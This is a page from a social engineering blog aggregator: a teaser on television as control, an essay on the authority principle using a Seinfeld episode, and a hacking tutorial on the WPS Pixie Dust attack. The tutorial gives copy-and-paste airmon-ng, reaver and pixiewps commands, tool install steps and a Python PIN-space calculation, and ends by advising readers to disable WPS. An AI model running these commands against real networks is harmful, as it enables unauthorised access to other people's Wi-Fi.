Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

Changing Minds Blog September 26, 2015

The power of television and control of a country

Television is a surprisingly powerful form of control, especially in some countries.

Filed Under: Uncategorized

The Influence People Blog September 21, 2015

Jerry Seinfeld: Following the Lead of an Expert

I’m a big Seinfeld fan. No matter how many times I’ve seen an episode I always laugh. I’ve watched reruns so many times over the past 25 years I feel like Jerry, George, Elaine and Kramer are personal friends. What I appreciate most is how the show portrays everyday situations in such a humorous light. An episode I watched recently went right to the heart of one of the principles of influence, so I felt compelled to write about it.

In this particular Seinfeld rerun Jerry bought a fancy, very expensive tennis racquet from Milosh, the owner of the sporting goods store associated with the tennis club Jerry belonged to. A short time later Jerry discovered Milosh was a terrible tennis player while playing at another club with Elaine. Apparently Milosh was so bad he wouldn’t play at his own club because he knew it would kill his reputation and sales. The following conversation ensued between Jerry and Elaine later at Jerry’s apartment:

Elaine – “So he was bad. What do you care?”

Jerry – “Elaine, I paid $200 for this racquet because he said it’s the only one he plays with. He could play just as well with a log.”

What sealed the deal for Jerry was the thought of a tennis pro – an expert – playing with the suggested racquet. He thought if it was good enough for the pro then of course he should play with it too because pros only use the very best equipment.

Jerry’s actions go to the heart of the principle of authority – we rely on those with superior knowledge, wisdom or expertise, when making decisions. And the advice of an expert is even more effective when someone isn’t sure what to do.

Jerry had been playing with a wooden racquet and had no idea there was a better option available until the pro told him so. Any newer racquet would have been an improvement but the more expensive racquet must be better because, after all, “you get what you pay for,” according to the old saying.

This happens quite often, especially when someone takes up a new sport. They buy lots of fancy, expensive equipment because that’s what the best athletes use. Unfortunately the novices could have saved a lot of hard-earned cash by going with good, but less expensive equipment, until they got much better. The very best equipment makes a difference for the very best players because sometimes the difference between winning and losing is a fraction of a second, a single stroke, or inches.

Is expert advice worth listening to? Most of the time, yes, but just be leery when that advice might lead to very costly purchases that make very little difference in the end.

Brian Ahearn, CMCT®
Chief Influence Officer
influencePEOPLE
Helping You Learn to Hear “Yes”.

Filed Under: Seinfeld

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your access point. WiFi Protected Setup makes it nice and easy to connect your wireless devices by using a simple PIN instead of your hard-to-guess passphrase. The issue is that this makes your secure 32-character passphrase about as much use as a chocolate fireguard: instead of taking potentially years to crack, you can attack the PIN, which only has 11,000 iterations and can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them, along with the Enrollee and Registrar Public Keys, the E & R Nonces and the Auth Key, to decipher the WPS PIN.

Just to provide some comparison: using the WPS PixieDust attack we got the PIN and then the WPA2 passphrase in less than a second. Stealing the WPA2 hash and attacking it directly with a single GPU, the estimated time to crack, based on knowing it's alphanumeric with no special characters, is 853,399 days, 2 hours and 44 minutes. So yeah, WPS adds some weakness to your hardened access point :)

Below is the code used during the above video; you can easily copy and paste it with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon --wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column, check for one of the following values to confirm the access point has WPS enabled: 1.0, LAB, PBC, NFC, PIN. If none of them appears, either WPS is not supported on the device or you have successfully disabled it.

Filed Under: Hacking, Tools
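To show where the 11,000 figure in the WPS post above comes from, and how it compares with a 32-character alphanumeric passphrase, here is an added example (not code from the original post, reaver or pixiewps). It relies on two properties of WPS: the eighth PIN digit is a checksum of the first seven, and the protocol confirms the two 4-digit halves separately. The sample first half `1234` is constructed.

```python
import math


def wps_checksum(first7: int) -> int:
    """Return the 8th PIN digit, a checksum over the first seven digits."""
    accum, weight = 0, 3
    while first7:
        accum += weight * (first7 % 10)
        first7 //= 10
        weight = 4 - weight  # weights alternate 3, 1, 3, 1, ... from the right
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit matches the checksum."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_checksum(int(pin[:7])) == int(pin[7]))


def valid_second_halves(first_half: str) -> list[str]:
    """All 4-digit second halves that give a checksum-valid PIN."""
    return [f"{s:04d}" for s in range(10_000)
            if is_valid_pin(first_half + f"{s:04d}")]


def pin_search_space() -> dict[str, int]:
    """Worst-case number of candidates under three models of the PIN check."""
    second = len(valid_second_halves("1234"))  # constructed sample first half
    return {
        "naive_8_digits": 10**8,
        "with_checksum": 10**4 * second,
        "halves_confirmed_separately": 10**4 + second,
    }


def entropy_bits(candidates: int) -> float:
    return math.log2(candidates)


def passphrase_space(length: int = 32, alphabet: int = 62) -> int:
    """Keyspace of an alphanumeric passphrase (a-z, A-Z, 0-9)."""
    return alphabet ** length


if __name__ == "__main__":
    for model, n in pin_search_space().items():
        print(f"{model:30s} {n:>12,d}  ({entropy_bits(n):5.1f} bits)")
    bits = entropy_bits(passphrase_space())
    print(f"{'32-char alphanumeric':30s} {'62^32':>12s}  ({bits:5.1f} bits)")
```

With the PIN method enabled, the effective strength of the network is that of the PIN, not of the passphrase, which is why disabling WPS and confirming it no longer shows in the WPS column matters.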
